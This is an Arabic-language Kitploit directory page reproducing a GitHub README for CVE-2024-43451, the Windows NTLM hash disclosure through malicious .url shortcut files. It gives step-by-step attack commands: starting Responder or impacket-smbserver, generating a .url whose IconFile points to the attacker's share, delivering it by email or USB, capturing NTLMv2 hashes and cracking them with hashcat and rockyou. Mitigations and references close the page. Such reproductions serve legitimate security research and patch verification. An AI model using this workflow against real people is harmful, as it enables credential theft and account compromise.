Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2024-43451-ntlm_hash_disclosure_reproduction — إعادة إنتاج CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction | Kitploit
أدوات/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
كسر كلمات المرورأدوات التصيدالاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

إعادة إنتاج CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction

عرض المستودع
منذ 28 أياملم تتم المراجعة بعد

CVE-2024-43451 — ثغرة كشف تجزئة NTLM والانتحال في ويندوز

نظرة عامة

CVE-2024-43451 هي ثغرة كشف تجزئة NTLMv2 والانتحال في ويندوز. تتيح لمهاجم بعيد غير مصادق تسريب تجزئة NTLM الخاصة بالضحية عبر إقناعها بالتفاعل مع ملف اختصار .url خبيث. يتم استغلال الثغرة بأقل قدر من تفاعل المستخدم — بمجرد النقر بزر الماوس الأيمن، أو حذف الملف، أو نقله يكفي لتسريب التجزئة. تحمل درجة CVSS تبلغ 6.5 (متوسطة) وقد تم استغلالها بنشاط في البرية. أضافها CISA إلى كتالوج الثغرات المستغلة المعروفة (KEV).

التفاصيل الفنية

مصادقة NTLM

NTLM (NT LAN Manager) هو بروتوكول مصادقة قائم على التحدي والاستجابة تستخدمه ويندوز. عندما يحاول عميل الوصول إلى مورد عبر SMB، يقوم العميل والخادم بإجراء مصافحة:

  1. يرسل العميل رسالة NEGOTIATE_MESSAGE تحتوي على القدرات المدعومة.
  2. يستجيب الخادم برسالة CHALLENGE_MESSAGE تحتوي على رقم عشوائي (nonce) من 8 بايت (تحدي الخادم).
  3. يستجيب العميل برسالة AUTHENTICATE_MESSAGE تحتوي على تجزئة NTLMv2 — وهي HMAC-MD5 للتحدي مدمجة مع تجزئة كلمة مرور المستخدم واسم المستخدم والمجال.

إذا تمكّن المهاجم من مراقبة أو تحفيز محاولة مصادقة NTLM إلى جهاز يتحكم به، يمكن كسر رسالة AUTHENTICATE_MESSAGE الملتقطة دون اتصال لاستعادة كلمة المرور النصية.

تنسيق ملف .url

ملف .url هو ملف اختصار تستخدمه إنترنت إكسبلورر ومستكشف ويندوز لتخزين الروابط. وهو ملف بتنسيق INI يحتوي على قسم [InternetShortcut]. الحقول الحرجة للاستغلال هي:

  • URL= — عنوان URL الهدف الذي سيفتحه ويندوز.
  • IconFile= — مسار UNC اختياري لمورد الأيقونة. عندما يعرض مستكشف ويندوز الملف، فإنه يحاول تلقائيًا استرداد الأيقونة من المشاركة البعيدة، مما يؤدي إلى إطلاق محاولة مصادقة NTLM إلى خادم المهاجم.

ناقل الهجوم

ينشئ المهاجم ملف .url بمعامل IconFile يشير إلى \\attacker-ip\share\icon.ico. عندما تقوم الضحية بـ:

  • النقر بزر الماوس الأيمن على الملف (يجلب مستكشف ويندوز الأيقونة لقائمة السياق)،
  • نقل أو نسخ الملف (تتم إعادة قراءة الأيقونة)، أو
  • حذف الملف (يتم جلب الأيقونة لمربع حوار سلة المحذوفات)،

يحاول مستكشف ويندوز تحميل الأيقونة من مسار UNC، مما يرسل تجزئة NTLMv2 الخاصة بالضحية إلى مستمع SMB الخاص بالمهاجم (مثل Responder).

الإصدارات المتأثرة

جميع الإصدارات المدعومة من ويندوز قبل تحديث Patch Tuesday لشهر نوفمبر 2024:

  • ويندوز 10 (جميع الإصدارات)
  • ويندوز 11
  • ويندوز سيرفر 2016 / 2019 / 2022 / 2025
  • ويندوز سيرفر 2008 / 2012 R2
  • الإصدارات الأقدم غير المدعومة معرضة للخطر أيضًا على الأرجح لكنها لن تتلقى تصحيحات.

إعداد الاستغلال

المتطلبات

  • جهاز المهاجم: لينكس أو ويندوز مع أداة التقاط SMB (مثل Responder أو smbserver من Impacket أو Inveigh).
  • جهاز الضحية: أي نظام ويندوز غير مصحح.
  • الوصول إلى الشبكة: يجب أن تتمكن الضحية من الوصول إلى عنوان IP الخاص بالمهاجم على المنفذ 445 (SMB).

الأدوات

الأداةالوصف
Responderأداة تسميم LLMNR/NBT-NS/mDNS مع خادم SMB مدمج لالتقاط التجزئة
Impacket

خطوات إعادة الإنتاج

1. تشغيل مستمع SMB (جهاز المهاجم)

باستخدام Responder:

root@kitploit:~
sudo responder -I eth0 -v

أو باستخدام Impacket:

root@kitploit:~
sudo impacket-smbserver share . -smb2support

2. إنشاء ملف .url الخبيث

root@kitploit:~
python exploit.py --ip 192.168.1.100 --output malicious.url

3. تسليم الملف إلى الضحية

  • مرفق بريد إلكتروني، أو بطاقة USB، أو مشاركة ملفات، أو تنزيل من الويب.

4. تفاعل الضحية

أي من الإجراءات التالية يؤدي إلى تسريب التجزئة:

  • النقر بزر الماوس الأيمن ← يتم جلب الأيقونة لقائمة السياق ← إرسال مصافحة NTLM إلى المهاجم
  • الحذف ← يتم جلب الأيقونة لمربع حوار التأكيد
  • النقل/النسخ ← تتم إعادة قراءة الأيقونة من مسار UNC
  • مجرد عرض المجلد في طريقة عرض التفاصيل أو الأيقونات (تحميل الأيقونة)

5. التقاط التجزئة

يستقبل مستمع SMB الخاص بالمهاجم تجزئة NTLMv2:

root@kitploit:~
[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. كسر التجزئة (دون اتصال)

root@kitploit:~
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

إثبات المفهوم

root@kitploit:~
# See exploit.py in this repository for a full PoC implementation.
# The script generates a .url file with IconFile set to:
#   \\192.168.1.100\share\icon.ico
# and optionally a custom display icon via IconIndex.

التخفيف

المراجع

  • مركز استجابة أمن مايكروسوفت — CVE-2024-43451
  • كتالوج الثغرات المستغلة المعروفة لدى CISA
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — هجمات مستهدفة على أوكرانيا
  • تحليل حملة UAC-0194 / SparkRAT
تنزيل الأداة
يمكن استخدام smbserver.py لاستضافة مشاركة SMB بسيطة
Inveighأداة التقاط NTLM مبنية على PowerShell لويندوز
الإجراء الوقائيالوصف
تطبيق تصحيح نوفمبر 2024تثبيت التحديث الأمني من مايكروسوفت من KB5044285
حظر SMB الصادر (المنفذ 445)منع تجزئات NTLM من مغادرة محيط الشبكة
تعطيل NTLM حيثما أمكناستخدام مصادقة Kerberos فقط
تفعيل توقيع SMBيمنع هجمات إعادة التوجيه حتى لو تم التقاط التجزئات
تدريب المستخدمين على الوعي الأمنيتوعية المستخدمين بعدم التفاعل مع ملفات .url غير متوقعة
تقييد التعامل مع ملفات .urlاستخدام نهج المجموعة لحظر تشغيل ملفات .url أو تسليمها عبر البريد الإلكتروني